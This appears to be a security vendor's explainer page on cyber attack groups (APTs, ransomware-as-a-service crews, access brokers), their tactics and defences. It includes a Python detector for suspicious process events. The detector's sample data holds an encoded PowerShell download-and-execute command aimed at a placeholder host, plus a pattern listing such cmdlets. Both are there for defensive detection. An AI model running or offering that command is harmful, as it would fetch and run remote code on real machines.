What are attack groups?
Attack groups (also known as threat actors or threat groups) are organized, persistent human adversaries behind coordinated cyber campaigns. These groups include skilled operators, and often have defined objectives, command structures and bespoke toolkits. They range from state‑sponsored espionage units (advanced persistent threats) to profit‑driven criminal enterprises running global cybercriminal franchises (e.g. ransomware‑as‑a‑service).
Key statistic: Multiple threat-intelligence reports identify Qilin as the most active ransomware group in 2025. For example, one study found that Qilin was responsible for roughly 18% of all observed ransomware attacks since April 2025, making it the single most prolific operation over that period (source: Cyble and other industry analyses).
How attack groups operate
Large‑scale group operations follow a multistage attack chain:
- Reconnaissance: Operators research targets, scan public‑facing systems for unpatched vulnerabilities and gather employee data for spear‑phishing.
- Initial compromise: They gain a foothold using spear‑phishing, zero‑day exploits or stolen credentials.
- Establish foothold: Attackers deploy “living‑off‑the‑land” tools (e.g., PowerShell, WMI) to evade detection and set up command‑and‑control channels.
- Privilege escalation and lateral movement: They harvest credentials and move laterally to reach domain controllers, file servers and backup repositories.
- Actions on objectives:
  - RaaS groups: Exfiltrate data for double extortion, then encrypt systems with ransomware.
  - APTs: Steal sensitive intellectual property, state secrets or sabotage critical infrastructure.
Types of attack groups
Attack groups differ by motivation, sophistication and affiliation.
Advanced persistent threats (APTs) – State‑backed espionage
APTs are nation‑state or state‑affiliated teams focused on long‑term espionage, intellectual‑property theft and sabotage. They maintain persistence for months or years.
- Lazarus Group (North Korea) – Linked to bank heists and espionage.
- Sandworm (Russia) – Responsible for NotPetya and attacks on Ukrainian infrastructure.
- APT41 (China) – Known for supply‑chain compromises and dual espionage / financial operations.
Ransomware-as-a-service (RaaS) groups – Modern criminal ecosystems
RaaS groups supply ransomware to affiliates who perform intrusions, creating large, franchised operations. The landscape has shifted dramatically since 2023; several newer groups now dominate activity.
Most active in 2024–2025:
Qilin – One of the fastest-growing and most active RaaS operations in 2025
Qilin’s rapid rise reflects the fragmentation of the ransomware ecosystem after major takedowns. Their campaigns feature data theft, double extortion and broad targeting across healthcare, manufacturing, and government.
Akira – Persistent and technically capable midsized RaaS group
Akira continues to run effective campaigns, often entering through compromised VPN appliances and unpatched remote services. Notable for targeting both Windows and Linux environments.
DragonForce – Emerging “ransomware cartel” model
DragonForce rebranded and expanded its affiliate network in 2024–2025, positioning itself as a consortium rather than a single group. They combine data-theft operations with high-pressure extortion tactics.
Initial access brokers (IABs)
Initial access brokers are specialized criminal groups that infiltrate organizations and then sell that access to other threat actors, including ransomware-as-a-service affiliates, data-theft crews and financial-fraud groups.
Their role is foundational in today’s cybercrime economy. Instead of conducting full intrusions themselves, they focus on:
- Harvesting credentials.
- Exploiting vulnerabilities on internet-facing systems.
- Breaching VPNs, firewalls, and remote-access services.
- Selling verified access on dark-web marketplaces.
This division of labor enables RaaS groups to scale quickly because affiliates can purchase ready-made access rather than performing the initial compromise themselves.
Example: Many major ransomware incidents in 2024–2025 began with access acquired from IABs rather than by the ransomware groups themselves.
Hacktivist groups
Hacktivists carry out politically or ideologically motivated attacks such as DDoS, website defacement and data leaks. Their primary goal is publicity rather than financial gain.
Business impact of a group‑driven breach
A successful breach by a well‑organized group has severe consequences:
- Direct financial loss: Ransom demands, regulatory fines, legal liabilities and the costs of forensic investigation and remediation. These expenses accumulate quickly, especially in large-scale incidents.
- Crippling downtime: Extended outages can cost more than the ransom itself, as highlighted by ENISA and other agencies.
- Reputational damage: Customers and partners lose trust, leading to churn and difficulty attracting new business.
- Loss of competitive advantage: Intellectual‑property theft erodes long‑term market position.
Recent trends in attack‑group TTPs
Callback social engineering and ClickFix-style attacks: Ransomware and crimeware groups increasingly rely on “callback” schemes where victims are prompted to call a fake support line. Operators then guide them through steps that grant attackers remote access (e.g., through ScreenConnect, AnyDesk or malicious “fix” tools). This method bypasses email security entirely and has become a preferred initial access vector for several RaaS affiliates.
AI-enhanced phishing and deepfake interaction: Attack groups now use AI to generate highly personalized phishing content, business-email-compromise lures and even real-time deepfake audio to impersonate executives or IT staff. This makes traditional red-flag detection (spelling errors, tone inconsistencies) far less reliable.
Cloud identity abuse and lateral movement via SaaS: Instead of targeting endpoints, attackers compromise OAuth tokens, cloud admin accounts or identity providers. This enables silent access to email, file storage and collaboration platforms without touching traditional endpoints.
Ecosystem professionalization: IAB–RaaS pipelines: Initial Access Brokers (IABs) now function as dependable suppliers for major ransomware groups. Affiliates rarely perform their own intrusion work; they simply purchase credentials or footholds and immediately deploy payloads. This specialization accelerates the speed of attacks and explains why groups like Qilin, Akira and DragonForce have risen so quickly.
Abuse of remote management and IT automation tools: Attackers are increasingly weaponizing legitimate MSP and enterprise IT tools (RMMs, deployment platforms, update servers). These platforms allow mass ransomware deployment with a single command once compromised — a tactic seen repeatedly in 2024–2025 outbreaks.
How to defend against attack groups
- Identity and access management: Enforce phishing‑resistant multifactor authentication (MFA) and least‑privilege access. Identity attacks are now the leading vector (Source: SANS Institute).
- Network segmentation: Stop lateral movement by isolating critical systems.
- Comprehensive backup and DR: A 3‑2‑1 backup strategy with offline / immutable copies is the best defense against ransomware; downtime costs often dwarf ransom amounts.
- Endpoint detection and response (EDR / MDR): Detect behavioral anomalies (LotL, credential theft) rather than relying solely on signatures.
- Patch management: Close exploited vulnerabilities by applying patches promptly.
- Security awareness training: Teach employees to recognize spear‑phishing and social engineering. Human error drives many identity‑related breaches (Source: SANS Institute).
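As an added illustration of the behavioral-detection point above (example code written for this page, not Acronis product code): a small Python heuristic that runs over constructed process-creation events and flags the living-off-the-land patterns the attack chain describes, such as Office or WMI spawning a shell and PowerShell launched with an encoded command. Field names loosely follow Sysmon process-creation events and every sample event is constructed.

```python
import base64
import re

def _enc(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed sample events, not real telemetry: one Office-to-PowerShell launch with an
# encoded download cradle, one WMI-spawned shell, and one benign admin script run.
EVENTS = [
    {"Image": "powershell.exe", "ParentImage": "WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')")},
    {"Image": "cmd.exe", "ParentImage": "WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Image": "powershell.exe", "ParentImage": "explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Cmdlets commonly seen in download-and-execute cradles.
CRADLE = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile", re.I)
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the flag is absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event: dict) -> list:
    """Return the list of heuristic labels that fire for one process-creation event."""
    hits = []
    img = event["Image"].lower()
    parent = event["ParentImage"].lower()
    if parent in OFFICE_PARENTS and img in SHELLS:
        hits.append("office_spawns_shell")      # classic spear-phishing macro behaviour
    if parent == "wmiprvse.exe" and img in SHELLS:
        hits.append("wmi_spawns_shell")         # remote execution via WMI
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        hits.append("encoded_command")          # obfuscated PowerShell invocation
        if CRADLE.search(decoded):
            hits.append("download_cradle")      # decoded payload fetches and runs more code
    return hits

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ParentImage"], "->", ev["Image"], analyze(ev))
```

The benign third event produces no labels, which is the point of behavioral rules: the alert is on parent/child relationships and obfuscation, not on PowerShell itself.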
How Acronis Cyber Protect Stops Attack Groups
Acronis Cyber Protect delivers an integrated defense tailored to the multi‑stage tactics of RaaS and APT groups:
- AI‑Based Behavioral Detection: Uses machine‑learning models to stop zero‑day exploits, ransomware encryption attempts and credential‑scraping tools.
- Integrated Backup & Instant Recovery: Immutable backups neutralize ransom demands; compromised systems and data can be restored in minutes.
- Endpoint Detection & Response (EDR): Provides attack‑chain visualization and guided response to isolate threats, terminate processes and roll back malicious changes.
- Vulnerability Assessment & Patch Management: Automatically identifies and remediates vulnerable software to block common entry vectors.
Frequently Asked Questions about Attack Groups
What's the difference between an attack group, threat actor, and APT?
These terms are often used interchangeably, but have subtle differences:
- Threat Actor (or Attack Group): This is the broadest term. It refers to any individual or group that poses a cybersecurity threat, from a lone hacker to a state-sponsored team.
- Cybercriminal Group: This is a threat group motivated purely by financial gain. Their goals are theft, extortion, and fraud. Ransomware-as-a-Service (RaaS) groups like BlackCat/ALPHV are a primary example.
- Advanced Persistent Threat (APT): This is a specific, high-level type of attack group. APTs are typically state-sponsored, highly skilled, and well-funded. Their goal is not immediate profit but long-term espionage, sabotage, or geopolitical disruption. They are "persistent" because they aim to maintain long-term, stealthy access to a target's network.
What motivates different types of attack groups?
Motivations are the primary way to classify attack groups. The main drivers are:
- Financial Gain: The goal is money. This includes RaaS groups extorting ransoms, criminal enterprises stealing bank credentials, and data brokers selling stolen PII on the dark web.
- Espionage: The goal is information. State-sponsored APTs like Lazarus Group steal intellectual property, military plans, and political secrets from rival governments and high-value corporations.
- Ideology: The goal is to make a statement. "Hacktivist" groups deface websites, leak data, or launch DDoS attacks to support a political or social cause.
- Sabotage: The goal is disruption. This is common in military or geopolitical conflicts, where an attack group's objective is to shut down critical infrastructure, like a power grid (e.g., Sandworm) or financial system.
What does TTP stand for in cybersecurity?
TTP stands for Tactics, Techniques, and Procedures. It's a framework, most famously used by MITRE ATT&CK, to describe and analyze an attack group's behavior.
- Tactics: The attacker's high-level goal (e.g., "Initial Access" or "Lateral Movement").
- Techniques: The specific method used to achieve a tactic (e.g., "Phishing" or "Using Stolen Credentials").
- Procedures: The exact implementation, tool, or exploit used for a technique (e.g., using the LockBit 3.0 payload delivered via a specific email lure).
Where can I find up-to-date info about known attack groups?
You can get the latest research, campaign analysis, and TTP breakdowns from cybersecurity vendors and government agencies. The Acronis Cyber Protection Operation Centers (CPOCs) publish regular analysis on new and emerging threats in our TRU (Threat Research and Update) articles. Other key resources include CISA Alerts, the MITRE ATT&CK framework, and annual reports from security firms.